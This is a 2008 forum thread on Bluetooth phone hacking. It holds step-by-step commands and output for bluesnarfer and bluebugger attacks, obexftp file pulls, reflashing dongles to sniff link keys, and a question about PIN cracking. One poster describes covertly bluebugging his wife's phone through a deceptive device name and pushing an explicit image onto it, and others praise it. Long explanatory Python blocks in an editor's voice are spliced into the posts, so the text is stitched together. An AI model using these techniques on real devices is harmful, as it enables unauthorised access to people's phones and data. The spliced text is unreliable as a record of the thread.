[bc03rut1-01] Uses a BlueCore3-Rom chipset from a leading Bluetooth chipset supplier

So it's a ROM alright :( ahh well. I'll have to buy a RAM one.

Try to look for your answer rather than be lazy ;)... google that manufacturing code, even google your own one. That link has some seriously good comments and information you can read to achieve your goal. I myself am waiting for the £££ to buy one.

williamc
01-31-2008, 08:32 PM
I've searched the forums and found the following that have a CSR chipset and allow firmware modifying:

Linksys USBBT100 Rev 1
D-Link DBT-120 Rev C1
DELOCK 61478
A7 eb502-HCI
Fujitsu Siemens BLUETOOTH V2.0
Toshiba PA3455U-1BTM
Aircable Host XR
Cellink BTA-6030 Bluetooth Adapter

The adapter must allow flashing of the external memory, so finding the correct adapter is painstaking. There are numerous revisions and chipset changes. Also changes from BlueCore4-external to BlueCore-ROM will prevent flashing. If anyone knows of any others, please add them to the list. If you know where to buy any of the mentioned adapters (with correct revision #), post as well, as many are discontinued or not sold in the states. Thanks.

William

Natty Dreed
02-05-2008, 06:25 PM
I'm dumb

I followed some commands without knowing what they are

and I got a problem in windows

it tells me to turn on your bluetooth device but it's already ON

in linux there are no problems

williamc
02-08-2008, 11:08 PM
If you need an adapter:
You can buy the DLink DBT-120 RevC1 at Fry's and Newegg.com.

I noticed a typo in a lot of posts referring to psget as psset.

Finally, for those with the old Nokia phone, you can check out my old tutorial showing some exploits:
http://www.irongeek.com/i.php?page=videos/bluesnarf1

Looking forward to some more updates on this thread. Thanks Dr_Green!

William

drgr33n
02-14-2008, 06:42 AM
Hey Guys

Have you got your bluetooth dongles ready because here it is the software for backtrack to enable sniffing.

I've added it to Blue-Smash, just download and install and sniff away :D

Blue-Smash v1.0c (http://www.mediafire.com/?ewg9n5zjn5u)

Bluetooth Sniffing with Blue-Smash Video Tutorial / Demo (http://www.mediafire.com/?4t0chlyaaye)

Online Demo Vid (No Sound) (http://blip.tv/scripts/flash/showplayer.swf?enablejs=true&feedurl=http://drgr33n.blip.tv/rss&file=http://blip.tv/rss/flash/674924&showplayerpath=http://blip.tv/scripts/flash/showplayer.swf)


Enjoy :cool:

skindeep
02-17-2008, 07:02 PM
Any info on the limitations of these vulnerabilities on newer devices. Will these apps only exploit older devices as others have mentioned?

drgr33n
03-14-2008, 01:07 AM
Hey guys

Sorry to drag a old post up but I've been playing with the bluetooth dongles for a while now and I thought it would be nice to post the cheapest dongle I found with the BC04 EXT chipset.

EDIT

Sorry received dongles and they were broadcom :( Going back to my original Fujitsu-Siemens BLUETOOTH v2.0 dongle.


Any info on the limitations of these vulnerabilities on newer devices. Will these apps only exploit older devices as others have mentioned?

The only info I have is that bluetooth is in its honeymoon stages so you may find some devices are exploitable and some are not. I can't remember whether it was the bluesnarfer or the bluebugger exploit that was successful on the nokia phones because of an undisclosed secret channel (17) that allowed unauthorised access to the phone.

These exploits will still be valid because if you can get the link key, you could connect to a piconet and spoof the mac addy of the slave device, then you would be able to attack the master.

With sorbo's tools its only a matter of time before we should get "opencsr" the open source firmware for the CSR chipsets. This should allow injection amongst other things :D

unix_r00ter
03-26-2008, 01:00 PM
great thread, thanks for the help :D 10/10

williamc
03-31-2008, 07:53 PM
I'm getting some errors with Bluesmash 1.0e

Checking to see if HCI device exists....
No Local Device Detected! Please check your hardware.
Maybe Try 'hciconfig hci*' up and restart Blue|Smash.

Blue|Smash will now exit!


However hci0 is up:


bt ~ # hciconfig -a
hci0: Type: USB
BD Address: 00:17:9A:2B:86:11 ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:102 acl:0 sco:0 events:0 errors:0
TX bytes:24 acl:0 sco:0 commands:8 errors:0

drgr33n
04-01-2008, 12:51 AM
Hey Williamc

It's because your modded bt dongle is no longer recognized as a bluetooth adapter. You will need to use a normal bt dongle to run bluesmash, or comment out the following, around line 50 in the main program



##### Hardware Check #####
# Excerpt from Blue|Smash; it relies on the program having imported sys earlier
# and bound `bt` to PyBluez's low-level HCI module (assumed: import bluetooth._bluetooth as bt).

print "Checking to see if HCI device exists...."
try:
    sock = bt.hci_open_dev()                                        # open the first HCI adapter
    results = bt.hci_inquiry(sock, duration=1, flush_cache=True)   # short inquiry to prove it answers
    print "Sucsess :D!"
except bt.error:
    # A re-flashed (sniffer-firmware) dongle or a downed adapter ends up here.
    print """No Local Device Detected! Please check your hardware.
Maybe Try 'hciconfig hci*' up and restart Blue|Smash.

Blue|Smash will now exit!
"""
    sys.exit(1)

##### End Hardware Check #####
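The reason the check above fails on a re-flashed dongle is visible in williamc's `hciconfig -a` output: the adapter is UP but carries the RAW flag and reports ACL/SCO MTUs of 0:0, so normal HCI commands never reach it. As an added example (not Blue|Smash's code or anything from the thread), the block below parses `hciconfig -a` text using the field layout pasted throughout this thread and applies that distinction, so a script can tell "no adapter" from "adapter present but unusable for HCI" before it tries an inquiry. Both sample outputs are constructed; the addresses are placeholders.

```python
"""Classify adapters from `hciconfig -a` output: normal HCI vs. RAW/re-flashed.

Added example, not code from Blue|Smash, bluez or the thread. The sample
outputs below are constructed to follow the layout hciconfig prints.
"""
import re


def parse_hciconfig(text):
    """Return {adapter name: fields} for every hciX block in hciconfig -a output."""
    adapters = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"^(hci\d+):\s+Type:\s+(\S+)", line)
        if m:  # start of a new adapter block
            current = {"type": m.group(2), "flags": [], "bdaddr": None,
                       "acl_mtu": None, "sco_mtu": None,
                       "manufacturer": None, "hci_ver": None}
            adapters[m.group(1)] = current
            continue
        if current is None:
            continue
        m = re.match(r"^BD Address:\s+(\S+)\s+ACL MTU:\s+(\d+):\d+\s+SCO MTU:\s+(\d+):\d+", line)
        if m:
            current["bdaddr"] = m.group(1)
            current["acl_mtu"] = int(m.group(2))
            current["sco_mtu"] = int(m.group(3))
        elif re.match(r"^(UP|DOWN)\b", line):
            current["flags"] = line.split()  # e.g. ['UP', 'RUNNING', 'RAW']
        elif line.startswith("Manufacturer:"):
            current["manufacturer"] = line.split(":", 1)[1].strip()
        else:
            m = re.match(r"^HCI Ver:\s+([\d.]+)", line)
            if m:
                current["hci_ver"] = m.group(1)
    return adapters


def hci_usable(adapter):
    """True when the adapter can serve normal HCI commands (inquiry, connect)."""
    flags = adapter["flags"]
    if "UP" not in flags or "RUNNING" not in flags:
        return False
    # A dongle running sniffer firmware is bound in RAW mode with 0:0 MTUs;
    # hciconfig still lists it, but inquiry through it fails.
    if "RAW" in flags or adapter["acl_mtu"] == 0:
        return False
    return True


def is_csr(adapter):
    """True for Cambridge Silicon Radio parts, the only ones bccmd will talk to."""
    manu = adapter["manufacturer"] or ""
    return "Cambridge Silicon Radio" in manu


# Constructed sample 1: an ordinary CSR dongle, fully usable.
NORMAL_DONGLE = """hci0:   Type: USB
        BD Address: 00:11:22:33:44:55 ACL MTU: 384:8 SCO MTU: 64:8
        UP RUNNING
        RX bytes:925 acl:0 sco:0 events:20 errors:0
        TX bytes:65 acl:0 sco:0 commands:18 errors:0
        Features: 0xff 0xff 0x8f 0xfe 0x9b 0xf9 0x00 0x80
        Link mode: SLAVE ACCEPT
        Name: 'CSR - bc4'
        HCI Ver: 2.0 (0x3) HCI Rev: 0x7a6 LMP Ver: 2.0 (0x3) LMP Subver: 0x7a6
        Manufacturer: Cambridge Silicon Radio (10)
"""

# Constructed sample 2: the same kind of dongle after re-flashing; note RAW and 0:0 MTUs.
RAW_DONGLE = """hci0:   Type: USB
        BD Address: 00:11:22:33:44:66 ACL MTU: 0:0 SCO MTU: 0:0
        UP RUNNING RAW
        RX bytes:102 acl:0 sco:0 events:0 errors:0
        TX bytes:24 acl:0 sco:0 commands:8 errors:0
"""

if __name__ == "__main__":
    for label, dump in (("normal", NORMAL_DONGLE), ("re-flashed", RAW_DONGLE)):
        adapter = parse_hciconfig(dump)["hci0"]
        print("%-11s usable for HCI: %s, CSR: %s" % (label, hci_usable(adapter), is_csr(adapter)))
```

Running `hciconfig -a` through `parse_hciconfig` before the Blue|Smash hardware check gives a more specific message than "No Local Device Detected": the adapter is there, it is just not an HCI adapter any more.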

hongman
04-07-2008, 07:06 PM
Hi guys

I have just started looking and playing with bluetooth hacks, and I have come across a few problems which I hope someone can help with.

My Bluetooth adapter of choice is the built in one in my Sony Vaio TR2MP.

hciconfig -a looks like this:


bt ~ # hciconfig -a
hci0: Type: USB
BD Address: 08:00:46:CC:9C:A1 ACL MTU: 192:8 SCO MTU: 64:8ss
RX bytes:673 acl:0 sco:0 events:19 errors:0
TX bytes:322 acl:0 sco:0 commands:19 errors:0
Features: 0xff 0xff 0x0f 0x00 0x00 0x00 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy: RSWITCH HOLD SNIFF PARK
Link mode: ACCEPT MASTER
Name: 'device1'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.1 (0x1) HCI Rev: 0x30d LMP Ver: 1.1 (0x1) LMP Subver: 0x30d
Manufacturer: Cambridge Silicon Radio (10)


I have followed the guide up until the firmware flashing part, where I kinda get lost.

I can use hcitool scan hci0

When I use bluebugger with
bluebugger -c 3 -a MAC info I can get the info; anything else and it prompts the phone with an authentication challenge. If I enter the passkey 1234 (set in my config) it says connection refused.

Soooo...in all the demos I see, it doesn't challenge for auth. Is this right?

Also noticed that although my device name is "device1" in the config, it's using the computer name. Something isn't quite right.

I saw somewhere I have a BlueCore2-External chip if that helps. Please let me know if you need any further outputs, and/or what could be wrong.

Thanks

EDIT: Ok, let me update.

Using SDPTOOL I found out my Nokia uses DUN on 2, OPUSH on 9 and FTP on 11. If I use bluebugger on channel 2 and 11, I get prompted for a passkey (even if I put in the right one it doesn't work). If I use 9, the phone asks me if I want to receive a message. Clicking Yes results in nothing happening, no error or anything.

If I use Bluesnarfer, I get the same result as others here:

Bluesnarfer: open /dev/rfcomm0, Connection Refused
Bluesnarfer: bt_rfcomm_config failed
Bluesnarfer: unable to create rfcomm connection
Bluesnarfer: release rfcomm ok

Did anyone find out the fix for this?

drgr33n
04-08-2008, 06:19 PM
Hey hongman

You have to start your bluetooth services.



bash /etc/rc.d/rc.bluetooth start

hongman
04-08-2008, 06:28 PM
Hi Dr

It is started, of that I am sure because I can use sdptool browse Victim_MAC and get results back.

My problem is:

When I use bluebugger or bluesnarfer it still prompts for a passkey. Entering 0000 or 1234 doesn't work and I get a connection refused message, or it just hangs until I hit ctrl C.

I have yet to pull any phonebooks or messages or anything :(

I am testing on my Nokia E61, Blackberry Curve and Nokia N91.

Thanks in advance

drgr33n
04-09-2008, 01:19 AM
You can still use sdptool without your bluetooth services running. You will have to pair your PC to your phone to snarf a phonebook.

Can your phone see your PC ?

hongman
04-09-2008, 10:19 AM
You can still use sdptool without your bluetooth services running.

OH.

My phone cannot see my laptop. I tried using:

hcitool cc MAC
hcitool auth MAC

But on Auth I get an error. Let me boot my laptop up and I'll tell you what Im doing/not doing!

Thank you.

hongman
04-09-2008, 11:01 AM
OK.

Booted up BT3b.


hciconfig hci0 up
hciconfig -a
hci0: Type: USB
BD Address: 08:00:46:CC:9C:A1 ACL MTU: 192:8 SCO MTU: 64:8
UP RUNNING
RX bytes:79 acl:0 sco:0 events:8 errors:0
TX bytes:30 acl:0 sco:0 commands:8 errors:0
Features: 0xff 0xff 0x0f 0x00 0x00 0x00 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: ' '
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.1 (0x1) HCI Rev: 0x30d LMP Ver: 1.1 (0x1) LMP Subver: 0x30d
Manufacturer: Cambridge Silicon Radio (10)


Can Scan OK.

bt ~ # hcitool scan hci0
Scanning ...
00:18:42:EA:56:11 Dave
00:1C:35:51:D1:5F English


Can use sdptool browse


bt ~ # sdptool browse 00:18:42:EA:56:11
Browsing 00:18:42:EA:56:11 ...
Service Name: AVRCP Target
Service Description: Audio Video Remote Control
Service Provider: Symbian Software Ltd.
Service RecHandle: 0x10000
Service Class ID List:
"AV Remote Target" (0x110c)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 23
"AVCTP" (0x0017)
uint16: 0x100
Profile Descriptor List:
"AV Remote" (0x110e)
Version: 0x0100

Service RecHandle: 0x10001
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 1

Service Name: OBEX Object Push
Service RecHandle: 0x10003
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 9
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100

Service Name: Imaging
Service RecHandle: 0x10005
Service Class ID List:
"Imaging Responder" (0x111b)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 15
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Imaging" (0x111a)
Version: 0x0100

Service Name: Audio Source
Service RecHandle: 0x10007
Service Class ID List:
"Audio Source" (0x110a)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 25
"AVDTP" (0x0019)
uint16: 0x100
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Advanced Audio" (0x110d)
Version: 0x0100

Service Name: SyncMLClient
Service RecHandle: 0x1000b
Service Class ID List:
UUID 128: 00000002-0000-1000-8000-0002ee000002
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 10
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x00000002-0000-1000-8000-0002ee000002)
Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x1000c
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 11
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100

Service Name: Nokia OBEX PC Suite Services
Service RecHandle: 0x1000d
Service Class ID List:
UUID 128: 00005005-0000-1000-8000-0002ee000001
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 12
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x00005005-0000-1000-8000-0002ee000001)
Version: 0x0100

Service Name: SyncML DM Client
Service RecHandle: 0x1000e
Service Class ID List:
UUID 128: 00000004-0000-1000-8000-0002ee000002
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 13
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x00000004-0000-1000-8000-0002ee000002)
Version: 0x0100

Service Name: Nokia SyncML Server
Service RecHandle: 0x1000f
Service Class ID List:
UUID 128: 00005601-0000-1000-8000-0002ee000001
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 14
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x00005601-0000-1000-8000-0002ee000001)
Version: 0x0100

Service Name: SIM Access
Service RecHandle: 0x10010
Service Class ID List:
"SIM Access" (0x112d)
"Generic Telephony" (0x1204)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 8
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"SIM Access" (0x112d)
Version: 0x0101

Service Name: Dial-Up Networking
Service RecHandle: 0x10018
Service Class ID List:
"Dialup Networking" (0x1103)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 2
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Dialup Networking" (0x1103)
Version: 0x0100

Service Name: Hands-Free Audio Gateway
Service RecHandle: 0x10020
Service Class ID List:
"Handfree Audio Gateway" (0x111f)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Handsfree" (0x111e)
Version: 0x0105

Service Name: Headset Audio Gateway
Service RecHandle: 0x10021
Service Class ID List:
"Headset Audio Gateway" (0x1112)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 4
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100


I can see DUN2, SIM8, FTP11, OPUSH9

Let's change my hcid.conf.


nano /etc/bluetooth/hcid.conf

Changed what was necessary to match the guide on page 1.

Now to restart bluetooth services


bt ~ # bash /etc/rc.d/rc.bluetooth restart
Stopping Bluetooth subsystem: pand dund rfcomm hidd sdpd hcid.
Starting Bluetooth subsystem: hcid passkeys.


Now I do mknod and sdptool commands but for my channels.


bt ~ # mknod -m 666 /dev/rfcomm0 c 216 2
bt ~ # mknod -m 666 /dev/rfcomm1 c 216 9
bt ~ # mknod -m 666 /dev/rfcomm2 c 216 11
bt ~ # sdptool add --channel=2 DUN
bt ~ # sdptool add --channel=9 OPUSH
bt ~ # sdptool add --channel=11 FTP


So now I should be all set up right?


bluebugger -c 2 -a MAC info


bluebugger 0.1 ( MaJoMu | www.codito.de )
-----------------------------------------

Target Device: '00:18:42:EA:56:11'
Target Name: 'Dave'

Cannot open '/dev/rfcomm0': Connection refused


Before the "Cannot open" error I get prompted for a passkey which seems to work.

Channel 2 and 11 both do this.

If I use 9, I get "Do you want to receive message from ...". Hitting yes makes bluebugger just hang there till I CTRL-C.

I did
bash /etc/rc.d/rc.bluetooth start just to be sure. It started hcid and passkeys.

For info if you need it:


bt ~ # hciconfig hci* revision
hci0: Type: USB
BD Address: 08:00:46:CC:9C:A1 ACL MTU: 192:8 SCO MTU: 64:8
HCI 16.7.5
Chip version: BlueCore02-External
Max key size: 56 bit
SCO mapping: PCM



bt ~ # hcitool cc 00:18:42:EA:56:11
bt ~ # hcitool auth 00:18:42:EA:56:11
Not connected


bt ~ # bccmd psget -s 0x0000 0x02bf
USB product identifier: 0x0002 (2)


Ok, I think I included everything. Can you see what is wrong?

I want to get this working so bad, spent 3 days solid on this :(
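The browse listing above is where the channel numbers come from (hongman reads off DUN 2, SIM 8, FTP 11, OPUSH 9 by hand), and a long listing is easy to misread. The following is an added example, not code from the thread: a Python parser for `sdptool browse` text that keeps the RFCOMM channel of every record, maps the SIG-assigned 16-bit service class numbers (0x1103 Dialup Networking, 0x1105 OBEX Object Push, 0x1106 OBEX File Transfer, 0x112d SIM Access) to the shorthand names `sdptool add` accepts, and prints the `sdptool add --channel=N` lines the post types manually. SAMPLE is a trimmed copy of the output posted above; records that are L2CAP-only (AVRCP, with a PSM instead of a channel) and the nameless record at handle 0x10001 are handled rather than skipped.

```python
"""Parse `sdptool browse <bdaddr>` output into a service -> RFCOMM channel map.

Added example for this thread, not part of the original posts. SAMPLE is a
trimmed copy of the browse output above. PROFILE_UUIDS holds SIG assigned
16-bit service class numbers; the values are the shorthands `sdptool add` takes.
"""
import re

PROFILE_UUIDS = {
    0x1103: "DUN",    # Dialup Networking
    0x1105: "OPUSH",  # OBEX Object Push
    0x1106: "FTP",    # OBEX File Transfer
    0x112d: "SAP",    # SIM Access
}

# a class list entry such as: "SIM Access" (0x112d)
CLASS_RE = re.compile(r'"[^"]*"\s*\((0x[0-9a-fA-F]{4})\)')


def _new_record(name):
    return {"name": name, "handle": None, "classes": [], "channel": None}


def parse_sdp_browse(text):
    """One dict per service record. `channel` is the RFCOMM channel, or None for
    L2CAP-only services (those carry a PSM line instead)."""
    services, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Browsing "):
            continue
        if line.startswith("Service Name:"):
            current = _new_record(line.split(":", 1)[1].strip())
            services.append(current)
            section = None
        elif line.startswith("Service RecHandle:"):
            # a record with no Service Name line (handle 0x10001 above) starts here
            if current is None or current["handle"] is not None:
                current = _new_record(None)
                services.append(current)
            current["handle"] = line.split(":", 1)[1].strip()
            section = None
        elif current is None:
            continue
        elif line.endswith("List:"):
            section = line[:-1]                       # e.g. "Service Class ID List"
        elif section == "Service Class ID List":
            m = CLASS_RE.search(line)
            if m:
                current["classes"].append(int(m.group(1), 16))
            elif line.startswith("UUID 128:"):        # vendor services (Nokia PC Suite etc.)
                current["classes"].append(line.split(":", 1)[1].strip())
        elif section == "Protocol Descriptor List" and line.startswith("Channel:"):
            # "Channel:" only ever follows the "RFCOMM" (0x0003) protocol entry
            current["channel"] = int(line.split(":", 1)[1])
    return services


def rfcomm_channels(services):
    """Map sdptool shorthand -> channel the target exposes it on (first record wins)."""
    out = {}
    for svc in services:
        if svc["channel"] is None:
            continue
        for cls in svc["classes"]:
            if isinstance(cls, int) and cls in PROFILE_UUIDS:
                out.setdefault(PROFILE_UUIDS[cls], svc["channel"])
    return out


def setup_commands(channels):
    """The per-channel `sdptool add` lines the thread runs by hand, lowest channel first."""
    return ["sdptool add --channel=%d %s" % (ch, name)
            for name, ch in sorted(channels.items(), key=lambda kv: kv[1])]


SAMPLE = """Browsing 00:18:42:EA:56:11 ...
Service Name: AVRCP Target
Service Description: Audio Video Remote Control
Service Provider: Symbian Software Ltd.
Service RecHandle: 0x10000
Service Class ID List:
  "AV Remote Target" (0x110c)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 23
  "AVCTP" (0x0017)
    uint16: 0x100
Profile Descriptor List:
  "AV Remote" (0x110e)
    Version: 0x0100

Service RecHandle: 0x10001
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 1

Service Name: OBEX Object Push
Service RecHandle: 0x10003
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 9
  "OBEX" (0x0008)
Language Base Attr List:
  code_ISO639: 0x454e
  encoding: 0x6a
  base_offset: 0x100
Profile Descriptor List:
  "OBEX Object Push" (0x1105)
    Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x1000c
Service Class ID List:
  "OBEX File Transfer" (0x1106)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 11
  "OBEX" (0x0008)

Service Name: SIM Access
Service RecHandle: 0x10010
Service Class ID List:
  "SIM Access" (0x112d)
  "Generic Telephony" (0x1204)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 8

Service Name: Dial-Up Networking
Service RecHandle: 0x10018
Service Class ID List:
  "Dialup Networking" (0x1103)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 2
Profile Descriptor List:
  "Dialup Networking" (0x1103)
    Version: 0x0100
"""

if __name__ == "__main__":
    for cmd in setup_commands(rfcomm_channels(parse_sdp_browse(SAMPLE))):
        print(cmd)
```

Feed it `sdptool browse <bdaddr> | python3 sdpmap.py` style input (or paste the text into SAMPLE) and compare the DUN/OPUSH/FTP/SAP channels it reports with the ones you pass to bluebugger's `-c`; a "Connection refused" on a channel that is not in this map is a wrong channel, not a pairing problem.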

drgr33n
04-09-2008, 01:08 PM
Ok everything looks good and passkey agent looks like it is running, try searching with your phone and linking via the phone.

Also could you go through the process again and record the process with hcidump. Send it over and I will assist more.

hongman
04-09-2008, 04:57 PM
Thanks a lot Dr, it will probably be tomorrow now but watch this space!

Do I just run hcidump -w dumpfile?

drgr33n
04-09-2008, 05:01 PM
np m8, yes just upload the dumpfile.

Also I may be a day answering because I had a HDD meltdown last night and I'm now running from the BT3 live CD until I rebuild later :mad:

hongman
04-09-2008, 05:08 PM
Thanks, sorry to hear about your HDD :(

I really wanna try bluesmash but I'm running Live CD :P maybe they could include it in next BT3 release :)

I'm not linux savvy enough to incorporate it into my Live CD myself yet :P

One thing, once this is all working I should be able to pull info from my phone without pairing right?

hongman
04-09-2008, 05:55 PM
http://rapidshare.de/files/39069491/dump.html

That is the dump file. I used the command above with hcidump and this is the order I did things:

hcitool scan hci0
sdptool browse MAC
edited hcid.conf as above
mknod + sdptool add
hcitool browse hci0 (decided to try a colleagues Nokia N92)
bluebugger info

Thanks in advance. The log file is not parsed by the way.

drgr33n
04-13-2008, 01:29 PM
Sorry about the late reply.

I cannot download the dump file, I keep getting invalid session? It might be an error at rapidshare so I'll try later in the evening.

hongman
04-14-2008, 10:32 AM
Hmm, it's coming up invalid for me too.

I'll try to re-do it later.

thewheelieking
04-15-2008, 10:54 AM
Hello everyone,

This is my first post and would like to say that Dr GrEen is very informative in many aspects of pen testing. I would also like to thank you Dr GrEen, for the various information you have posted on this site, which has kept me lurking and learning for 5 months. I finally found something I can contribute, so here goes.

I was having the same authentication issue as Hongman, where I would try to connect with any program from Back Track 3 Beta which prompted the phone for a passkey, and found that typing in the passkey on the phone (seems everyone is using "1234") would end in a "connection refused". After Googling "hcid.conf outgoing passkey", because I took the time to read the hcid.conf completely the billionth time around and found it said incoming passkey, I came across entering the passkey I wanted into the following file:


kwrite /etc/bluetooth/passkeys/default <-- type in just the passkey no quotes & save.

I was able to verify the pin when typing it into my MetroPCS Motorola V3M. I have only had success connecting to a phone, so far, using obexftp and the following commands:


First get the directory tree.
obexftp -b BD_ADDR -c / -l


To download files
obexftp -b BD_ADDR -c /Picture -g example.jpg


to upload Files
obexftp -b BD_ADDR -c /Picture -p example.jpg


Got the above info here hxxp://xxx.go2linux.org/transfer-files-with-bluetooth-Linux.

Also to have your phone "discoverable" you need to add to the hcid.conf the following:


# Inquiry and Page scan
iscan enable; pscan enable;
discovto 0;

I was not able to try the discovery mode, as my phone only connects to Bluetooth headsets and I have a Targus ACB10US USB dongle with Broadcom chipset. bccmd reports "unsupported device" :mad:, but I will be purchasing something better shortly.

One last thing, I noticed I would never see PSCAN ISCAN in the "hciconfig -a" output until I entered this command:


hciconfig hci0 piscan


One last last thing, I made the following script file called "bluetoothsetup" saved to /mnt/sda1, as I use BT3usb:


#!/bin/bash
# bluetoothsetup: re-create the Bluetooth setup after every reboot of BT3usb
hciconfig hci0 up
hciconfig hci0 down
hciconfig hci0 reset
cp -f /mnt/sda1/backups/targusinfo/hcid.conf /etc/bluetooth/hcid.conf
# path corrected: the original line copied to /etc/bluetooth/passkey/default (no "s")
# and "can't get this to work yet"; the directory used earlier in this post is passkeys/
cp -f /mnt/sda1/backups/targusinfo/default /etc/bluetooth/passkeys/default
mknod -m 666 /dev/rfcomm0 c 216 8
mknod -m 666 /dev/rfcomm1 c 216 17
mknod -m 666 /dev/rfcomm2 c 216 16
sdptool add --channel=8 DUN
sdptool add --channel=16 FTP
sdptool add --channel=17 OPUSH
bash /etc/rc.d/rc.bluetooth restart
hciconfig hci0 piscan
hciconfig -a

I just open up a console and type "/mnt/sda1/backups/targusinfo/bluetoothsetup". No more retyping all that in every time I reboot!



P.S. I named my device "HitYesThenType1234" and then used bluebugger to initiate a connection to the wife's phone, without her knowing I was doing it. Guess what? She followed the directions and I was authenticated with her phone, where I pushed up a picture of some naked guy (using the obexftp commands above). I then went to her and asked to take a picture of our daughter, which I did, then proceeded to question her about the naked picture. After some heckling, I told her what I did and got a "how clever, you're way better looking, but if it was Antonio Banderas...." :o That Social Engineering is a mofo, ain't it...

hongman
04-15-2008, 05:33 PM
lol, very nicely done.

I am very busy at the moment with Work but as soon as I get a spare few I will try re-upload that file and also try the above.

Thanks for your contributions, great first post!

sanshinron
04-15-2008, 10:13 PM
After reading this topic carefully I managed to get this working. I had to download the newest bluez-libs, bluez-utils, bluez-firmware and bluez-hcitool (install in that order: firmware, libs, utils, hcitool) and then Dr Green's tutorial worked perfectly. But then I had to solve the connection refused issue (tried to write it to /etc/bluetooth/passkeys/default - bullseye ;d)

I made the same script as thewheelieking, except for those two cp -f lines because I have BackTrack on HDD, and put it in /root/.kde/autostart

Rebooted and everything works just fine, but I still have to pair phones using the 1234 PIN.
When I get connection refused I just randomly try other channels until it works.

When I have some time I'll post more specific output, what phones I tested and on which channels they connected.

Since it's no real use because of the need to enter a PIN, I am interested in some info on btcrack; I've looked on Google but there are no tutorials or manual whatsoever. Can you shed some light on this topic, please?

I had a PDF with AT commands somewhere, I'll post it as soon as I find it ;d

drgr33n
05-30-2008, 09:32 AM
Just a quick add :D Instead of sifting through your saved sniffed packets for the random numbers etc., I've only just found out you can use hcidump to read sorbo's dump file properly to extract the relevant data.

Here's a dump of a link key exchange between my phone and my laptop.



drgr33n ~ # hcidump -V -r out
HCI sniffer - Bluetooth packet analyzer ver 1.41
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
